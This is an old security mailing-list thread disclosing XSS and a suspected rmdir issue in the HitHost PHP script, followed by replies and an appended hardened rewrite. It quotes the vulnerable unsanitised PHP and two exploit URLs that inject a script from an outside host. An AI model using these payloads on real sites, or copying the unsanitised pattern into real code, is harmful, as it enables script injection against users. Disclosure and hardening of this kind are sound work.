Re: histhost v1.0.0 xss and possible rmdir

2006-03-15 Thread Chris Kuethe
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system
call] both say that the directory must be empty (i.e., have no entries
other than "." or "..").

rmdir(2) should fail and errno should be set to ENOTEMPTY if the
directory is not empty.

On 3/14/06, Steven M. Christey <[EMAIL PROTECTED]> wrote:
>
> retard said:
>
> >as you see line 19 raises suspicion of the possibility of rming 0777
> >dirs. I've tried it on my personal server with no success; if someone
> >knows of a way let me know.
>
> According to the PHP manual, rmdir only works on empty directories.
> Did you try to remove an empty directory?
>
> - Steve
>


--
GDB has a 'break' feature; why doesn't it have 'fix' too?


Re: histhost v1.0.0 xss and possible rmdir

2006-03-14 Thread Steven M. Christey

retard said:

>as you see line 19 raises suspicion of the possibility of rming 0777
>dirs. I've tried it on my personal server with no success; if someone
>knows of a way let me know.

According to the PHP manual, rmdir only works on empty directories.
Did you try to remove an empty directory?

- Steve


histhost v1.0.0 xss and possible rmdir

2006-03-07 Thread retard
-------- summary
software: HitHost
vendors website: http://daverave.64digits.com/index.php?page=hithost
versions: <= 1.0.0
class: remote
status: unpatched
exploit: available
solution: not available
discovered by: retard
risk level: medium

-------- description
hithost uses $_GET variables in crucial parts of their code causing
xss vulnerabilities and _possibly_ allowing users to rm dirs chmoded
to 0777

in ./admin/deleteuser.php:
15  else
16  {
17  unlink("users/$deleteuser/password.php");
18  unlink("users/$deleteuser/counter.php");
19  rmdir("users/$deleteuser/");
20  echo "The user $deleteuser has been deleted";
21  }

as you see line 19 raises suspicion of the possibility of rming 0777
dirs. I've tried it on my personal server with no success; if someone
knows of a way let me know.

in ./admin/viewuser.php:
6   $viewuser = $_GET['user'];
7   include("users/$viewuser/counter.php");
8   echo "Username: $viewuser";
9   echo "Number of counter hits: $hits";

this code is self-explanatory: the script does not sanitise
$_GET['user'], allowing users to easily shove xss into the variable.

-------- exploit(s)

http://example.com/admin/deleteuser.php?user=http://notlegal.ws/xss.js>

http://example.com/admin/viewuser.php?hits=http://notlegal.ws/xss.js>

-------- credit
author(s): retard
email: [EMAIL PROTECTED]
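A hardened rewrite of the two scripts discussed in the advisory (viewuser.php and deleteuser.php), added here as an example; it is not HitHost's code and not part of the thread. It assumes the users/<name>/ layout quoted above, PHP 7.4 or later, and uses function names of its own.

```php
<?php
// Added example, not HitHost's code: hardened handling of the "user" parameter
// that viewuser.php and deleteuser.php feed into include()/unlink()/rmdir().
// Assumes the users/<name>/ layout from the advisory and PHP 7.4 or later.
const USERS_DIR = __DIR__ . '/users';

// Allow only a conservative character set: no "/", "..", URLs or markup.
function validUsername(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name);
}

// Resolve users/<name> and confirm it still lies inside USERS_DIR (symlinks included).
function userDir(string $name): ?string
{
    $base = realpath(USERS_DIR);
    $real = validUsername($name) ? realpath(USERS_DIR . '/' . $name) : false;
    if ($base === false || $real === false || !is_dir($real)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// viewuser.php lines 6-9: validate before include(), escape before echo.
function viewUser(string $name): string
{
    $dir = userDir($name);
    if ($dir === null || !is_file("$dir/counter.php")) {
        return 'No such user';
    }
    $hits = 0;
    include "$dir/counter.php";   // sets $hits, as in the original
    return 'Username: ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8')
        . '<br>Number of counter hits: ' . (int) $hits;
}

// deleteuser.php lines 17-19: same validation, then the original removals;
// rmdir() still fails with ENOTEMPTY if anything else is left inside.
function deleteUser(string $name): bool
{
    $dir = userDir($name);
    if ($dir === null) {
        return false;
    }
    foreach (['password.php', 'counter.php'] as $f) {
        is_file("$dir/$f") && unlink("$dir/$f");
    }
    return rmdir($dir);
}
```

Wire it up with `echo viewUser((string) ($_GET['user'] ?? ''));` in viewuser.php; the admin pages should additionally sit behind authentication, which the advisory's snippets do not show.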